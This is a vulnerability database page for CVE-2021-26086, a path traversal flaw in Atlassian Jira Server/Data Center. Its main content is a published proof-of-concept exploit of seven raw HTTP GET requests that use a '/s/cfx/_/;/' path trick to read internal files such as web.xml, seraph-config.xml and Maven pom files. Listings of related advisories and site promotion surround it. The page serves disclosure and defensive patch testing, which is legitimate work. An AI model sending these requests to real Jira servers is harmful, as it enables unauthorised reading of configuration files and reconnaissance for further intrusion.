Lucene search

Atlassian Jira Server/Data Center 8.4.0 File Read

🗓️ 05 Oct 2021 00:00:00Reported by Mayank DeshmukhType

packetstorm🔗 packetstormsecurity.com👁 255 Views

Atlassian Jira Server/Data Center 8.4.0 Limited Remote File Read/Include vulnerability disclosed by Mayank Deshmuk

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 26
nvd	CVE-2021-26086	16 Aug 202101:15	–	nvd
cnvd	Unauthorized Access Vulnerability in Atlassian System dashboard-Jira	15 Jun 202200:00	–	cnvd
nuclei	Atlassian Jira Limited - Local File Inclusion	26 Aug 202103:45	–	nuclei
zdt	Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read Vulnerability	5 Oct 202100:00	–	zdt
attackerkb	CVE-2021-26086	12 Aug 202100:00	–	attackerkb
cisa_kev	Atlassian Jira Server and Data Center Path Traversal Vulnerability	12 Nov 202400:00	–	cisa_kev
vulnrichment	CVE-2021-26086	16 Aug 202100:15	–	vulnrichment
nessus	Atlassian Jira < 8.5.14 / 8.6.x < 8.13.6 / 8.14.x < 8.16.1 / 8.17.0 (JRASERVER-72695)	6 Jul 202200:00	–	nessus
nessus	Jira Server/Data Center Limited Remote File Read (CVE-2021-26086)	19 Dec 202300:00	–	nessus
seebug	Atlassian Jira 文件读取漏洞（CVE-2021-26086）	20 Aug 202100:00	–	seebug

`# Exploit Title: Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include  
# Date: 2021-10-05  
# Exploit Author: Mayank Deshmukh  
# Vendor Homepage: https://www.atlassian.com/  
# Software Link: https://www.atlassian.com/software/jira/download/data-center  
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1  
# Tested on: Kali Linux & Windows 10  
# CVE : CVE-2021-26086  
  
POC File #1 - web.xml  
  
GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
  
POC File #2 - seraph-config.xml  
  
GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
POC File #3 - decorators.xml  
  
GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
  
POC File #4 - /jira-webapp-dist/pom.properties  
  
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
POC File #5 - /jira-webapp-dist/pom.xml  
  
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
POC File #6 - /atlassian-jira-webapp/pom.xml  
  
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
POC File #7 - /atlassian-jira-webapp/pom.properties  
  
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1  
Host: 127.0.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

05 Oct 2021 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.94247